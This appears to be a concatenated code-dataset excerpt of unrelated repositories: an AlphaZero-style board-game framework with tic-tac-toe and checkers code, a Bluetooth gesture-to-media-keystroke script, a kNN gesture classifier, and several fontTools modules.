score += (1 - reward) # net1 is black
score = score / (2*half_count)
return score
class MCTSContextWrapper:
def __init__(self, board, player1_color):
self.board = board
self.player1_color = player1_color # color of the player 1 (net1)
self.mcts_ctx1 = MCTS(board) # mcts for player 1
self.mcts_ctx2 = MCTS(board) # mcts for player 2
def mcts_info(self):
"""
returns the information needed for the next mcts simulations
:return: the mcts object
1 or 2 depending on the network to use
"""
if self.player1_color == 1:
if self.board.current_player() == CONST.WHITE:
return self.mcts_ctx1, 1
else:
return self.mcts_ctx2, 2
else:
if self.board.current_player() == CONST.WHITE:
return self.mcts_ctx1, 2
else:
return self.mcts_ctx2, 1
def net_vs_net_mcts(net1, net2, mcts_sim_count, temp, game_count, game_class):
"""
plays the two passed network against each other, in half of the games net1 is white and in the other half net2
is white. to get the policy mcts is used.
:param net1: network 1
:param net2: network 2
:param game_count: the number of games to play in total, half of the games are played as white and the other half as black
:param game_class: the class of the game
:return: score of net1, the score is in the range of 0-1 where:
0: loss
0.5: draw
1: win
"""
half_count = game_count // 2
mcts_ctx_wrapper_list = []
for i in range(2*half_count):
if i < half_count:
mcts_ctx_wrapper_list.append(MCTSContextWrapper(game_class(), 1)) # net1 is white
else:
mcts_ctx_wrapper_list.append(MCTSContextWrapper(game_class(), 2)) # net2 is white
all_terminated = False
while not all_terminated:
# prepare the mcts context lists
mcts_list1 = [] # mcts list where net1 needs to be used
mcts_list2 = [] # mcts list where net2 needs to be used
for idx, mcts_ctx_wrapper in enumerate(mcts_ctx_wrapper_list):
# skip finished games
if mcts_ctx_wrapper.board.is_terminal():
continue
mcts_ctx, net_number = mcts_ctx_wrapper.mcts_info()
if net_number == 1:
mcts_list1.append(mcts_ctx)
else:
mcts_list2.append(mcts_ctx)
# run the mcts simulations
mcts.run_simulations(mcts_list1, mcts_sim_count, net1, 0)
mcts.run_simulations(mcts_list2, mcts_sim_count, net2, 0)
# execute the move of the tree search
for i_mcts_ctx, mcts_ctx in enumerate(mcts_list1):
# skip terminated games
if mcts_ctx.board.is_terminal():
continue
# choose the action according to the probability distribution
policy = mcts_ctx.policy_from_state(mcts_ctx.board.state_id(), temp)
action = np.random.choice(len(policy), p=policy)
# execute the action on the board
mcts_ctx.board.execute_action(action)
for i_mcts_ctx, mcts_ctx in enumerate(mcts_list2):
# skip terminated games
if mcts_ctx.board.is_terminal():
continue
# choose the action according to the probability distribution
policy = mcts_ctx.policy_from_state(mcts_ctx.board.state_id(), temp)
action = np.random.choice(len(policy), p=policy)
# execute the action on the board
mcts_ctx.board.execute_action(action)
# check if all boards are terminated
all_terminated = True
for mcts_ctx_wrapper in mcts_ctx_wrapper_list:
if not mcts_ctx_wrapper.board.is_terminal():
all_terminated = False
break
# calculate the score of network 1
score = 0
for mcts_ctx_wrapper in mcts_ctx_wrapper_list:
reward = (mcts_ctx_wrapper.board.reward() + 1) / 2
if mcts_ctx_wrapper.player1_color == 1:
score += reward # net1 is white
else:
score += (1-reward) # net1 is white
score = score / (2*half_count)
return score
```
#### File: games/tic_tac_toe/tic_tac_toe.py
```python
import numpy as np
from globals import CONST
import game
from games.tic_tac_toe import minimax
class TicTacToeBoard(game.GameBoard):
"""
each player gets a separate board representation
0 1 2
3 4 5
6 7 8
if a stone is set for a player the bit string will have a 1 on the correct position
a move is defined by a number, e.g. 4 (this represents setting a stone on the board position 4)
"""
def __init__(self):
self.white_player = 0
self.black_player = 0
self.player = CONST.WHITE # disk of the player to move
self.terminal = False # is the games finished
self.score = 0 # -1 if black wins, 0 if it is a tie and 1 if white wins
self.legal_moves_list = [] # holds all legal moves of the current board position
# calculate all legal moves and disks to flip
self.__calc_legal_moves__()
###########################################################################################################
# methods that need to be implemented #
###########################################################################################################
def is_terminal(self):
return self.terminal
def current_player(self):
return self.player
# def symmetries(self, policy):
# return None, None
#
#
# @staticmethod
# def symmetry_count():
# return 1
def white_perspective(self):
white_board = self.int_to_board(self.white_player)
black_board = self.int_to_board(self.black_player)
if self.player == CONST.WHITE:
bit_board = np.stack((white_board, black_board), axis=0)
player = CONST.WHITE
else:
bit_board = np.stack((black_board, white_board), axis=0)
player = CONST.BLACK
return bit_board, player
def state_id(self):
state = "{}_{}".format(self.white_player, self.black_player)
return state
def execute_action(self, move):
"""
plays the passed move on the board
:param move: integer that defines the position to set the stone
:return:
"""
# if move not in self.legal_moves:
# print("move not in list")
# set the token
if self.player == CONST.WHITE:
self.white_player = self.white_player + (1 << move)
else:
self.black_player = self.black_player + (1 << move)
# check if the player won
self.check_win()
# swap the active player and calculate the legal moves
self.swap_players()
self.__calc_legal_moves__()
def legal_actions(self):
return self.legal_moves_list
def illegal_actions(self):
"""
returns a list of illegal moves
:return:
"""
# define the mask with all disks
disk_mask = self.white_player ^ self.black_player
illegal_moves = []
for move in range(9):
if (1 << move) & disk_mask > 0:
illegal_moves.append(move)
return illegal_moves
def reward(self):
"""
:return: -1 if black has won
0 if the games is drawn or the games is still running
1 if white has won
"""
if not self.terminal:
return 0
else:
return self.score
def training_reward(self):
"""
:return: -1 if black has won
0 if the games is drawn or the games is still running
1 if white has won
"""
if not self.terminal:
return 0
else:
return self.score
###########################################################################################################
# helper methods #
###########################################################################################################
def from_board_matrix(self, board):
"""
creates the bit board from the passed board representation
:param board: games represented as one board
:return:
"""
white_board = board == CONST.WHITE
white_board = white_board.astype(int)
self.white_player = self.board_to_int(white_board)
black_board = board == CONST.BLACK
black_board = black_board.astype(int)
self.black_player = self.board_to_int(black_board)
# calculate all legal moves and disks to flip
self.__calc_legal_moves__()
# check the games states
self.swap_players()
self.check_win()
self.swap_players()
def print(self):
"""
prints the current board configuration
:return:
"""
# create the board representation form the bit strings
print(self.get_board_matrix())
def get_board_matrix(self):
"""
:return: human readable games board representation
"""
white_board = self.int_to_board(self.white_player)
black_board = self.int_to_board(self.black_player)
board = np.add(white_board * 1, black_board * 2)
return board
def int_to_board(self, number):
"""
creates the 3x3 bitmask that is represented by the passed integer
:param number: move on the board
:return: x3 matrix representing the board
"""
number = (number & 7) + ((number & 56) << 5) + ((number & 448) << 10)
byte_arr = np.array([number], dtype=np.uint32).view(np.uint8)
board_mask = np.unpackbits(byte_arr).reshape(-1, 8)[0:3, ::-1][:, 0:3]
return board_mask
def board_to_int(self, mask):
"""
converts the passed board mask (3x3) to an integer
:param mask: binary board representation 3x3
:return: integer representing the passed board
"""
bit_arr = np.reshape(mask, -1).astype(np.uint32)
number = bit_arr.dot(1 << np.arange(bit_arr.size, dtype=np.uint32))
return int(number)
def move_to_board_mask(self, move):
"""
:param move: integer defining a move on the board
:return: the move represented as a mask on the 3x3 board
"""
mask = 1 << move
board_mask = self.int_to_board(mask)
return board_mask
def check_win(self):
"""
checks if the current player has won the games
:return:
"""
if self.three_in_a_row(self.player):
self.terminal = True
self.score = 1 if self.player == CONST.WHITE else -1
def swap_players(self):
self.player = CONST.WHITE if self.player == CONST.BLACK else CONST.BLACK
def white_score(self):
reward = self.reward()
return (reward + 1) / 2
def black_score(self):
reward = self.reward()
return (-reward + 1) / 2
def __calc_legal_moves__(self):
# define the mask with all legal moves
move_mask = bit_not(self.white_player ^ self.black_player, 9) # this is basically an xnor (only 1 if both are 0)
self.legal_moves_list = []
for move in range(9):
if (1 << move) & move_mask > 0:
self.legal_moves_list.append(move)
# if there are no legal moves the games is drawn
if len(self.legal_moves_list) == 0:
self.terminal = True
def three_in_a_row(self, player):
"""
checks if the passed player has a row of three
:param player: the player for which 3 in a row is checked
:return:
"""
board = self.white_player if player == CONST.WHITE else self.black_player
# horizontal check
if board & 7 == 7 or board & 56 == 56 or board & 448 == 448:
return True
# vertical check
if board & 73 == 73 or board & 146 == 146 or board & 292 == 292:
return True
# diagonal check /
if board & 84 == 84:
return True
# diagonal check \
if board & 273 == 273:
return True
# nothing found
return False
def minimax_move(self):
"""
returns the optimal minimax move, if there are more than one optimal moves, a ranodm one is
picked
:return:
"""
# get the white score for all legal moves
score_list = np.empty(len(self.legal_moves_list))
for idx, move in enumerate(self.legal_moves_list):
board_clone = self.clone()
board_clone.execute_action(move)
state = board_clone.state_id()
white_score = minimax.state_dict.get(state)
score_list[idx] = white_score
# find the indices of the max score for white and the min score for black
if self.player == CONST.WHITE:
move_indices = np.argwhere(score_list == np.amax(score_list))
else:
move_indices = np.argwhere(score_list == np.amin(score_list))
move_indices = move_indices.squeeze(axis=1)
best_moves = np.array(self.legal_moves_list)[move_indices]
best_move = np.random.choice(best_moves, 1)
return int(best_move)
def bit_not(n, bit_length):
"""
defines the logical not operation
:param n: the number to which the not operation is applied
:param bit_length: the length of the bit to apply the not operation
:return:
"""
return (1 << bit_length) - 1 - n
```
#### File: test/games/checkersTest.py
```python
import unittest
from games.checkers import checkers
from globals import CONST
class TestCheckers(unittest.TestCase):
def setUp(self):
self.test_game = TestGame()
def test_game(self):
self.test_game.white_has_one_legal_capture()
self.assertEqual(self.test_game.current_player(), CONST.WHITE)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 1)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.test_game.black_has_two_captures()
self.assertEqual(self.test_game.current_player(), CONST.BLACK)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 2)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.assertTrue("x" in self.test_game.legal_pdn_moves()[1])
self.test_game.black_has_a_king()
self.assertTrue("B" in self.test_game.board.to_string())
self.test_game.black_can_make_king_move()
self.test_game.black_king_can_be_captured()
self.assertEqual(len(self.test_game.legal_pdn_moves()), 1)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.test_game.black_king_captured()
self.assertTrue("B" not in self.test_game.board.to_string())
self.test_game.white_one_branch_capture()
self.assertEqual(self.test_game.current_player(), CONST.WHITE)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 1)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.test_game.white_needs_to_decide_at_branch()
self.assertEqual(self.test_game.current_player(), CONST.WHITE)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 2)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.assertTrue("x" in self.test_game.legal_pdn_moves()[1])
self.test_game.white_has_king()
self.assertTrue("W" in self.test_game.board.to_string())
self.test_game.black_can_capture_whites_king()
self.assertEqual(self.test_game.current_player(), CONST.BLACK)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 1)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.test_game.no_white_king_anymore()
self.assertTrue("W" not in self.test_game.board.to_string())
self.test_game.black_one_double_capture_and_branch_capture()
self.assertEqual(self.test_game.current_player(), CONST.BLACK)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 2)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.assertTrue("x" in self.test_game.legal_pdn_moves()[1])
self.test_game.black_needs_to_decide_at_branch()
self.assertEqual(self.test_game.current_player(), CONST.BLACK)
self.assertEqual(len(self.test_game.legal_pdn_moves()), 2)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.assertTrue("x" in self.test_game.legal_pdn_moves()[1])
self.test_game.black_two_captures_and_king_capture()
self.assertEqual(len(self.test_game.legal_pdn_moves()), 3)
self.assertTrue("x" in self.test_game.legal_pdn_moves()[0])
self.assertTrue("x" in self.test_game.legal_pdn_moves()[1])
self.assertTrue("x" in self.test_game.legal_pdn_moves()[2])
class TestGame:
def __init__(self):
self.board = checkers.CheckersBoard()
def legal_pdn_moves(self):
legal_actions = self.board.legal_actions()
return [checkers.action_to_pdn(legal_action, self.board.player) for legal_action in legal_actions]
def current_player(self):
return self.board.current_player()
def white_has_one_legal_capture(self):
self.board.play_pdn_move("11-15")
self.board.play_pdn_move("24-19")
def black_has_two_captures(self):
self.board.play_pdn_move("15x24")
def black_has_a_king(self):
self.board.play_pdn_move("28x19")
self.board.play_pdn_move("8-11")
self.board.play_pdn_move("27-24")
self.board.play_pdn_move("3-8")
self.board.play_pdn_move("32-27")
self.board.play_pdn_move("11-15")
self.board.play_pdn_move("21-17")
self.board.play_pdn_move("10-14")
self.board.play_pdn_move("17x10")
def black_can_make_king_move(self):
self.board.play_pdn_move("6-10")
def black_king_can_be_captured(self):
self.board.play_pdn_move("3-7")
def black_king_captured(self):
self.board.play_pdn_move("2x11")
def white_one_branch_capture(self):
self.board.play_pdn_move("25-21")
self.board.play_pdn_move("1-6")
self.board.play_pdn_move("30-25")
self.board.play_pdn_move("11-16")
self.board.play_pdn_move("23-18")
def white_needs_to_decide_at_branch(self):
self.board.play_pdn_move("16x23")
def white_has_king(self):
self.board.play_pdn_move("23x32")
def black_can_capture_whites_king(self):
self.board.play_pdn_move("18x11")
self.board.play_pdn_move("8x15")
self.board.play_pdn_move("24-20")
self.board.play_pdn_move("32-27")
def no_white_king_anymore(self):
self.board.play_pdn_move("31x24")
def black_one_double_capture_and_branch_capture(self):
self.board.play_pdn_move("4-8")
self.board.play_pdn_move("21-17")
self.board.play_pdn_move("8-11")
self.board.play_pdn_move("25-21")
self.board.play_pdn_move("9-13")
self.board.play_pdn_move("29-25")
self.board.play_pdn_move("6-9")
self.board.play_pdn_move("26-23")
self.board.play_pdn_move("15-19")
def black_needs_to_decide_at_branch(self):
self.board.play_pdn_move("24x15")
def black_two_captures_and_king_capture(self):
self.board.play_pdn_move("15x8")
self.board.play_pdn_move("9-14")
self.board.play_pdn_move("8-3")
self.board.play_pdn_move("5-9")
self.board.play_pdn_move("3-7")
self.board.play_pdn_move("14-18")
if __name__ == '__main__':
unittest.main()
```
#### File: alpha-zero-framework/utils/utils.py
```python
import logging
import os
import sys
import cProfile
import io
import pstats
import re
def init_logger(level, **kwargs):
"""
initializes the logger
:param level: level of the logger, e.g. logging.DEBUG
:param kwargs: file_name: name of the file to which should be logged
:return:
"""
# initialize the logger
logger = logging.getLogger() # configure the root logger
logger.setLevel(level)
# create the file handler
if 'file_name' in kwargs:
# create the log file path if needed
file_name = kwargs.get('file_name')
os.makedirs(os.path.dirname(file_name), exist_ok=True)
# create the handler
file_handler = logging.FileHandler(file_name)
file_handler.setLevel(level)
# add the formatter
formatter_file = logging.Formatter(
'%(asctime)s.%(msecs)03d - %(name)-15s(%(lineno)-4d) - [%(levelname)-7s] - %(message)s',
datefmt="%Y-%m-%d %H:%M:%S")
file_handler.setFormatter(formatter_file)
logger.addHandler(file_handler)
# create the console logger
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setLevel(logging.DEBUG)
formatter_console = logging.Formatter(
'%(asctime)s.%(msecs)03d - %(name)-15s(%(lineno)-4d) - [%(levelname)-7s] - %(message)s', datefmt="%H:%M:%S")
console_handler.setFormatter(formatter_console)
logger.addHandler(console_handler)
logger.debug('logger successfully initialized')
def profile(fnc):
"""
decorator that can be used to profile function, the output is written to the file profile.txt
:param fnc: function for the decorator
:return:
"""
def inner(*args, **kwargs):
pr = cProfile.Profile()
pr.enable()
retval = fnc(*args, **kwargs)
pr.disable()
s = io.StringIO()
sortby = 'cumulative'
ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
ps.print_stats()
# write the output to a file
file = open("profile.txt", "w")
file.write(s.getvalue())
file.close()
return retval
return inner
def bit_not(n, bit_length):
"""
defines the logical not operation
:param n: the number to which the not operation is applied
:param bit_length: the length of the bit to apply the not operation
:return:
"""
return (1 << bit_length) - 1 - n
def atoi(text):
return int(text) if text.isdigit() else text
def popcount(num):
"""
counts the number of bits that are set in the passed integer
:param num: integer
:return:
"""
return bin(num).count('1')
def natural_keys(text):
"""
sort function for natural sort, this will sort strings like this
"something1", "something12", "something17", "something2", "something25"
use it like this: list.sort(key=natural_keys)
:param text:
:return:
"""
return [atoi(c) for c in re.split(r'(\d+)', text)]
``` |
{
"source": "13rianK/Senior-Thesis",
"score": 3
} |
#### File: 13rianK/Senior-Thesis/bluetooth.py
```python
import Adafruit_BluefruitLE, ctypes, os
from Adafruit_BluefruitLE.services import UART
cmd = """
osascript -e 'tell application "System Events" to keystroke "m"
using {command down}'
"""
right = """
osascript -e 'tell application "System Events" to key code 124'
"""
left = """
osascript -e 'tell application "System Events" to key code 123'
"""
Full = """
osascript -e 'tell application "System Events" to keystroke "f"
using {shift down} '
"""
pause = """
osascript -e 'tell application "System Events" to keystroke space'
"""
vdown = """
osascript -e 'tell application "System Events" to keystroke ">" '
"""
vup = """
osascript -e 'tell application "System Events" to key code 126'
"""
# Get the BLE provider for the current platform.
ble = Adafruit_BluefruitLE.get_provider()
# Main Function
def main():
ble.clear_cached_data() # Clear Cached Data
# Get the first available BLE network adapter
adapter = ble.get_default_adapter()
adapter.power_on()
print('Using adapter: {0}'.format(adapter.name))
# Disconnect any currently connected UART devices.
print('Disconnecting any connected UART devices...')
UART.disconnect_devices()
# Scan for UART devices.
print('Searching for UART device...')
try:
adapter.start_scan()
# Search for the first UART device found
device = UART.find_device()
if device is None:
raise RuntimeError('Failed to find UART device!')
finally:
# Make sure scanning is stopped before exiting
adapter.stop_scan()
print('Connecting to device...')
device.connect() # Will time out after 60 seconds
try:
print('Discovering services...')
UART.discover(device)
uart = UART(device)
while(1):
received = uart.read(timeout_sec=5)
print received
if received is not None :
if received == '20' :
os.system(right)
print('right')
elif received == '21' :
os.system(left)
print('left')
elif received == '30' :
os.system(Full)
print('Full')
elif received == '31' :
os.system(pause)
print('pause')
elif received == '10' :
os.system(vdown)
print('vdown')
elif received == '11' :
os.system(vup)
print('vup')
else:
print('Received no data!')
finally:
# Disconeect device on exit
device.disconnect()
###########################################################
# Initialize the BLE system and start main loop
ble.initialize()
ble.run_mainloop_with(main)
```
#### File: 13rianK/Senior-Thesis/kNN_Motion.py
```python
import csv
import math
# data is in the form of a matrix
# data is 8 dimensional along feature axis
# function to load in csv data
def load(file) :
matrix = []
with open(file) as csvfile :
data = csv.reader(csvfile, delimiter=',')
for row in data :
row = map(lambda x: float(x), row)
matrix.append(row[:8])
return matrix
# Function to remove dimensions not necessary
def remove(matrix, start, end) :
new_matrix = []
for vector in matrix :
new_matrix.append(vector[start:end])
return new_matrix
# load training data into gesture classes
def getGestureClasses() :
training = {}
imu = {}
training[0] = load('movinggesture1.csv')
training[1] = load('movinggesture2.csv')
training[2] = load('movinggesture1_1.csv')
training[3] = load('movinggesture2_1.csv')
training[4] = load('movinggesture1_2.csv')
training[5] = load('movinggesture2_2.csv')
imu[0] = remove(load('movinggesture1.csv'),5,8)
imu[1] = remove(load('movinggesture2.csv'),5,8)
imu[2] = remove(load('movinggesture1_1.csv'),5,8)
imu[3] = remove(load('movinggesture2_1.csv'),5,8)
imu[4] = remove(load('movinggesture1_2.csv'),5,8)
imu[5] = remove(load('movinggesture2_2.csv'),5,8)
return training, imu
# 1 = swipe right = gesture1
# 2 = raise hand = gesture2
# calculate distance between 2 N-dimensional vectors
# IMPORTANT: All data values are in angles (degrees)
def distance(x, y) :
if len(x) != len(y) :
return "Invalid Vectors"
totaldist = 0
for i in range(len(x)) :
totaldist += math.pow((float(x[i]) - float(y[i])),2)
return totaldist
def dictionary(length):
x = {}
for i in range(length) :
x[i] = 0
return x
# Function to find K nearest neighbors for a
# time series of RPY values
def getKNeighbors (k, test, gestclasses):
distances = []
gest_idx = 0
for gesture in gestclasses.values() :
totaldist = 0
for i in range(len(test)) :
totaldist += distance(gesture[i], test[i].tolist()) # Dot product of two matrices
distances.append((math.sqrt(totaldist)/2.0,gest_idx))
gest_idx += 1
distances.sort()
neighbors = dictionary(len(gestclasses)) # dict of gestures and counts
for dist, gest in distances[:k] :
neighbors[gest] += 1
result = max(neighbors, key=neighbors.get)
return result, distances
# get gesture for a single test point
def getGesture(k,test,TrainingData):
return getKNeighbors(k, test, TrainingData)
``` |
{
"source": "13rianlucero/CrabAgePrediction",
"score": 3
} |
#### File: fontTools/colorLib/geometry.py
```python
from math import copysign, cos, hypot, isclose, pi
from fontTools.misc.roundTools import otRound
def _vector_between(origin, target):
return (target[0] - origin[0], target[1] - origin[1])
def _round_point(pt):
return (otRound(pt[0]), otRound(pt[1]))
def _unit_vector(vec):
length = hypot(*vec)
if length == 0:
return None
return (vec[0] / length, vec[1] / length)
_CIRCLE_INSIDE_TOLERANCE = 1e-4
# The unit vector's X and Y components are respectively
# U = (cos(α), sin(α))
# where α is the angle between the unit vector and the positive x axis.
_UNIT_VECTOR_THRESHOLD = cos(3 / 8 * pi) # == sin(1/8 * pi) == 0.38268343236508984
def _rounding_offset(direction):
# Return 2-tuple of -/+ 1.0 or 0.0 approximately based on the direction vector.
# We divide the unit circle in 8 equal slices oriented towards the cardinal
# (N, E, S, W) and intermediate (NE, SE, SW, NW) directions. To each slice we
# map one of the possible cases: -1, 0, +1 for either X and Y coordinate.
# E.g. Return (+1.0, -1.0) if unit vector is oriented towards SE, or
# (-1.0, 0.0) if it's pointing West, etc.
uv = _unit_vector(direction)
if not uv:
return (0, 0)
result = []
for uv_component in uv:
if -_UNIT_VECTOR_THRESHOLD <= uv_component < _UNIT_VECTOR_THRESHOLD:
# unit vector component near 0: direction almost orthogonal to the
# direction of the current axis, thus keep coordinate unchanged
result.append(0)
else:
# nudge coord by +/- 1.0 in direction of unit vector
result.append(copysign(1.0, uv_component))
return tuple(result)
class Circle:
def __init__(self, centre, radius):
self.centre = centre
self.radius = radius
def __repr__(self):
return f"Circle(centre={self.centre}, radius={self.radius})"
def round(self):
return Circle(_round_point(self.centre), otRound(self.radius))
def inside(self, outer_circle, tolerance=_CIRCLE_INSIDE_TOLERANCE):
dist = self.radius + hypot(*_vector_between(self.centre, outer_circle.centre))
return (
isclose(outer_circle.radius, dist, rel_tol=_CIRCLE_INSIDE_TOLERANCE)
or outer_circle.radius > dist
)
def concentric(self, other):
return self.centre == other.centre
def move(self, dx, dy):
self.centre = (self.centre[0] + dx, self.centre[1] + dy)
def round_start_circle_stable_containment(c0, r0, c1, r1):
"""Round start circle so that it stays inside/outside end circle after rounding.
The rounding of circle coordinates to integers may cause an abrupt change
if the start circle c0 is so close to the end circle c1's perimiter that
it ends up falling outside (or inside) as a result of the rounding.
To keep the gradient unchanged, we nudge it in the right direction.
See:
https://github.com/googlefonts/colr-gradients-spec/issues/204
https://github.com/googlefonts/picosvg/issues/158
"""
start, end = Circle(c0, r0), Circle(c1, r1)
inside_before_round = start.inside(end)
round_start = start.round()
round_end = end.round()
inside_after_round = round_start.inside(round_end)
if inside_before_round == inside_after_round:
return round_start
elif inside_after_round:
# start was outside before rounding: we need to push start away from end
direction = _vector_between(round_end.centre, round_start.centre)
radius_delta = +1.0
else:
# start was inside before rounding: we need to push start towards end
direction = _vector_between(round_start.centre, round_end.centre)
radius_delta = -1.0
dx, dy = _rounding_offset(direction)
# At most 2 iterations ought to be enough to converge. Before the loop, we
# know the start circle didn't keep containment after normal rounding; thus
# we continue adjusting by -/+ 1.0 until containment is restored.
# Normal rounding can at most move each coordinates -/+0.5; in the worst case
# both the start and end circle's centres and radii will be rounded in opposite
# directions, e.g. when they move along a 45 degree diagonal:
# c0 = (1.5, 1.5) ===> (2.0, 2.0)
# r0 = 0.5 ===> 1.0
# c1 = (0.499, 0.499) ===> (0.0, 0.0)
# r1 = 2.499 ===> 2.0
# In this example, the relative distance between the circles, calculated
# as r1 - (r0 + distance(c0, c1)) is initially 0.57437 (c0 is inside c1), and
# -1.82842 after rounding (c0 is now outside c1). Nudging c0 by -1.0 on both
# x and y axes moves it towards c1 by hypot(-1.0, -1.0) = 1.41421. Two of these
# moves cover twice that distance, which is enough to restore containment.
max_attempts = 2
for _ in range(max_attempts):
if round_start.concentric(round_end):
# can't move c0 towards c1 (they are the same), so we change the radius
round_start.radius += radius_delta
assert round_start.radius >= 0
else:
round_start.move(dx, dy)
if inside_before_round == round_start.inside(round_end):
break
else: # likely a bug
raise AssertionError(
f"Rounding circle {start} "
f"{'inside' if inside_before_round else 'outside'} "
f"{end} failed after {max_attempts} attempts!"
)
return round_start
```
#### File: fontTools/feaLib/variableScalar.py
```python
from fontTools.varLib.models import VariationModel, normalizeValue
def Location(loc):
return tuple(sorted(loc.items()))
class VariableScalar:
"""A scalar with different values at different points in the designspace."""
def __init__(self, location_value={}):
self.values = {}
self.axes = {}
for location, value in location_value.items():
self.add_value(location, value)
def __repr__(self):
items = []
for location, value in self.values.items():
loc = ",".join(["%s=%i" % (ax, loc) for ax, loc in location])
items.append("%s:%i" % (loc, value))
return "(" + (" ".join(items)) + ")"
@property
def does_vary(self):
values = list(self.values.values())
return any(v != values[0] for v in values[1:])
@property
def axes_dict(self):
if not self.axes:
raise ValueError(
".axes must be defined on variable scalar before interpolating"
)
return {ax.axisTag: ax for ax in self.axes}
def _normalized_location(self, location):
location = self.fix_location(location)
normalized_location = {}
for axtag in location.keys():
if axtag not in self.axes_dict:
raise ValueError("Unknown axis %s in %s" % (axtag, location))
axis = self.axes_dict[axtag]
normalized_location[axtag] = normalizeValue(
location[axtag], (axis.minValue, axis.defaultValue, axis.maxValue)
)
return Location(normalized_location)
def fix_location(self, location):
location = dict(location)
for tag, axis in self.axes_dict.items():
if tag not in location:
location[tag] = axis.defaultValue
return location
def add_value(self, location, value):
if self.axes:
location = self.fix_location(location)
self.values[Location(location)] = value
def fix_all_locations(self):
self.values = {
Location(self.fix_location(l)): v for l, v in self.values.items()
}
@property
def default(self):
self.fix_all_locations()
key = Location({ax.axisTag: ax.defaultValue for ax in self.axes})
if key not in self.values:
raise ValueError("Default value could not be found")
# I *guess* we could interpolate one, but I don't know how.
return self.values[key]
def value_at_location(self, location):
loc = location
if loc in self.values.keys():
return self.values[loc]
values = list(self.values.values())
return self.model.interpolateFromMasters(loc, values)
@property
def model(self):
locations = [dict(self._normalized_location(k)) for k in self.values.keys()]
return VariationModel(locations)
def get_deltas_and_supports(self):
values = list(self.values.values())
return self.model.getDeltasAndSupports(values)
def add_to_variation_store(self, store_builder):
deltas, supports = self.get_deltas_and_supports()
store_builder.setSupports(supports)
index = store_builder.storeDeltas(deltas)
return int(self.default), index
```
#### File: fontTools/misc/cython.py
```python
from types import SimpleNamespace
def _empty_decorator(x):
return x
compiled = False
for name in ("double", "complex", "int"):
globals()[name] = None
for name in ("cfunc", "inline"):
globals()[name] = _empty_decorator
locals = lambda **_: _empty_decorator
returns = lambda _: _empty_decorator
```
#### File: otlLib/optimize/__init__.py
```python
from argparse import RawTextHelpFormatter
from textwrap import dedent
from fontTools.ttLib import TTFont
from fontTools.otlLib.optimize.gpos import compact, GPOS_COMPACT_MODE_DEFAULT
def main(args=None):
"""Optimize the layout tables of an existing font."""
from argparse import ArgumentParser
from fontTools import configLogger
parser = ArgumentParser(prog="otlLib.optimize", description=main.__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument("font")
parser.add_argument(
"-o", metavar="OUTPUTFILE", dest="outfile", default=None, help="output file"
)
parser.add_argument(
"--gpos-compact-mode",
help=dedent(
f"""\
GPOS Lookup type 2 (PairPos) compaction mode:
0 = do not attempt to compact PairPos lookups;
1 to 8 = create at most 1 to 8 new subtables for each existing
subtable, provided that it would yield a 50%% file size saving;
9 = create as many new subtables as needed to yield a file size saving.
Default: {GPOS_COMPACT_MODE_DEFAULT}.
This compaction aims to save file size, by splitting large class
kerning subtables (Format 2) that contain many zero values into
smaller and denser subtables. It's a trade-off between the overhead
of several subtables versus the sparseness of one big subtable.
See the pull request: https://github.com/fonttools/fonttools/pull/2326
"""
),
default=int(GPOS_COMPACT_MODE_DEFAULT),
choices=list(range(10)),
type=int,
)
logging_group = parser.add_mutually_exclusive_group(required=False)
logging_group.add_argument(
"-v", "--verbose", action="store_true", help="Run more verbosely."
)
logging_group.add_argument(
"-q", "--quiet", action="store_true", help="Turn verbosity off."
)
options = parser.parse_args(args)
configLogger(
level=("DEBUG" if options.verbose else "ERROR" if options.quiet else "INFO")
)
font = TTFont(options.font)
# TODO: switch everything to have type(mode) = int when using the Config class
compact(font, str(options.gpos_compact_mode))
font.save(options.outfile or options.font)
if __name__ == "__main__":
import sys
if len(sys.argv) > 1:
sys.exit(main())
import doctest
sys.exit(doctest.testmod().failed)
```
#### File: fontTools/pens/ttGlyphPen.py
```python
from array import array
from typing import Any, Dict, Optional, Tuple
from fontTools.misc.fixedTools import MAX_F2DOT14, floatToFixedToFloat
from fontTools.misc.loggingTools import LogMixin
from fontTools.pens.pointPen import AbstractPointPen
from fontTools.misc.roundTools import otRound
from fontTools.pens.basePen import LoggingPen, PenError
from fontTools.pens.transformPen import TransformPen, TransformPointPen
from fontTools.ttLib.tables import ttProgram
from fontTools.ttLib.tables._g_l_y_f import Glyph
from fontTools.ttLib.tables._g_l_y_f import GlyphComponent
from fontTools.ttLib.tables._g_l_y_f import GlyphCoordinates
__all__ = ["TTGlyphPen", "TTGlyphPointPen"]
class _TTGlyphBasePen:
def __init__(
self,
glyphSet: Optional[Dict[str, Any]],
handleOverflowingTransforms: bool = True,
) -> None:
"""
Construct a new pen.
Args:
glyphSet (Dict[str, Any]): A glyphset object, used to resolve components.
handleOverflowingTransforms (bool): See below.
If ``handleOverflowingTransforms`` is True, the components' transform values
are checked that they don't overflow the limits of a F2Dot14 number:
-2.0 <= v < +2.0. If any transform value exceeds these, the composite
glyph is decomposed.
An exception to this rule is done for values that are very close to +2.0
(both for consistency with the -2.0 case, and for the relative frequency
these occur in real fonts). When almost +2.0 values occur (and all other
values are within the range -2.0 <= x <= +2.0), they are clamped to the
maximum positive value that can still be encoded as an F2Dot14: i.e.
1.99993896484375.
If False, no check is done and all components are translated unmodified
into the glyf table, followed by an inevitable ``struct.error`` once an
attempt is made to compile them.
If both contours and components are present in a glyph, the components
are decomposed.
"""
self.glyphSet = glyphSet
self.handleOverflowingTransforms = handleOverflowingTransforms
self.init()
def _decompose(
self,
glyphName: str,
transformation: Tuple[float, float, float, float, float, float],
):
tpen = self.transformPen(self, transformation)
